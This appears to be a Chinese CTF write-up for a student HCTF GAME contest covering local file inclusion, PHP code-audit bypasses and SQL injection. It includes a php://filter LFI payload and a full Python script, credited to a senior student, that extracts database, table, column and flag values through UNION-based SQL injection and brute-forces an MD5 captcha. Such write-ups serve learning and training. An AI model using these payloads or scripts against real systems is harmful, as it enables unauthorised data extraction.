总的来说分为5类,菜鸡题,本地文件包含lfi,php代码审计,sql注入,xss

LFI

这次的lfi不难 第一题是http://119.29.138.57:12000/送分题,发现有文件包含

此处应该有图片

然后根据提示找到flag

第二题也是一道比较简单的题目,不过我当时没有时间做出来,23333

就是用php伪协议来得到其中文件 图片

第三题是第三周出的,难度也比较难根据学长的write-up才会,

这是学长的wp:http://heartsky.info/2017/02/06/HCTF-GAME-week3-writeup/

先是发现由前两题的file变为了image,并且除了.jpg都会返回File not found 所以PHP匹配的是.jpg且必须有resource=../flag.php,还必须有resource=jpg,这样便能得到payload:img=php://filter/resource=jpg/resource=../flag.php

php代码审计

第一次做代码审计题目,比较简单

php1即用空白字符%0c即可绕过is_numeric和is_string这两个函数

PHP2利用php弱类型原构造两个数组进行绕过

php3利用溢出构造0.7100000000000000000a即可,

sql注入

作为一个web狗,sql不精,欢迎前往友链hammer大神的微博

我是链接:http://hammerorz.com/archives/8.html

我是学长heartsky的微博:http://heartsky.info/2017/02/06/HCTF-GAME-week3-writeup/

我只说说思路,为自己码着233333

sql1先用万能注入密码,得到flag is in another space

再用联合查询获得表名,列名,即可得到flag

sql2采用数字型注入,而且报错注入

sql3盲注,学长脚本已get

# coding=utf-8
'''
HTTP POST
盲注
'''
import requests
import re
import hashlib

url = 'http://45.32.25.65/nweb/sqli3/index.php'
pat = '</th></tr><tr><td>(.*?)</td><td>'
headers = {"Cookie":"PHPSESSID=c8qn7ef6lg7pvmof8hnlbhcdb6"}

def getDatabase():
    payload = "-1 UNION SELECT length(DATABASE()),'user'#"
    databaseLen = getData(payload)
    database = ''
    for i in range(int(databaseLen)):
        payload = "-1 UNION SELECT ascii(substring(DATABASE()," + str(i+1) + ",1)),'user'#"
        ch = getData(payload)
        database += chr(int(ch))
    print '[*] The current database is ' + database

def getTables():
    payload = "-1 UNION SELECT count(*),'user' FROM information_schema.tables WHERE table_schema=DATABASE()#"
    tableNumber = getData(payload)
    print '[*] Table number is ' + tableNumber
    for i in range(int(tableNumber)):
        tableName = ''
        print '[*] Table name ' + str(i) + ': ',
        payload = "-1 UNION SELECT length(table_name),'user' FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT " + str(i) +",1#"
        tableLen = getData(payload)
        for j in range(int(tableLen)):
            payload = "-1 UNION SELECT ascii(substring(table_name," + str(j+1) + ",1)),'user' FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT " + str(i) +",1#"
            ch = getData(payload)
            tableName += chr(int(ch))
        print tableName
        getColumns(tableName)

def getColumns(table):
    payload = "-1 UNION SELECT count(*),'user' FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='" + table + "'#"
    columnNumber = getData(payload)
    print '  [*] Column number is ' + columnNumber
    for i in range(int(columnNumber)):
        columnName = ''
        print '  [*] Column name ' + str(i) + ': ',
        payload = "-1 UNION SELECT length(column_name),'user' FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='" + table + "' LIMIT " + str(i) +",1#"
        columnLen = getData(payload)
        for j in range(int(columnLen)):
            payload = "-1 UNION SELECT ascii(substring(column_name," + str(j+1) + ",1)),'user' FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='" + table + "' LIMIT " + str(i) +",1#"
            ch = getData(payload)
            columnName += chr(int(ch))
        print columnName

def getFlag():
    payload = "-1 UNION SELECT length(flag),'user' FROM hhhhhhctf#"
    flagLen = getData(payload)
    print flagLen
    flag = ''
    for i in range(int(flagLen)):
        payload = "-1 UNION SELECT ascii(substring(flag," + str(i+1) + ",1)),'user' FROM hhhhhhctf#"
        ch = getData(payload)
        flag += chr(int(ch))
        print flag
    print '[*] The flag is: ' + flag

def getData(payload):
    r = requests.get(url, headers=headers)
    md5 = r.text.split('==\'')[1][0:4]
    code = blasting(md5)
    data = {'id':payload,'code':code}
    r = requests.post(url, data=data, headers=headers)
    return re.search(pat,r.text).group(1)

def blasting(code):
    for i in range(1000000):
        md5 = hashlib.md5(str(i)).hexdigest()[0:4]
        if md5 == code:
            return i

def main():
    # getDatabase()
    # getTables()
    # getFlag()
    print blasting('52c8')

if __name__ == '__main__':
    main()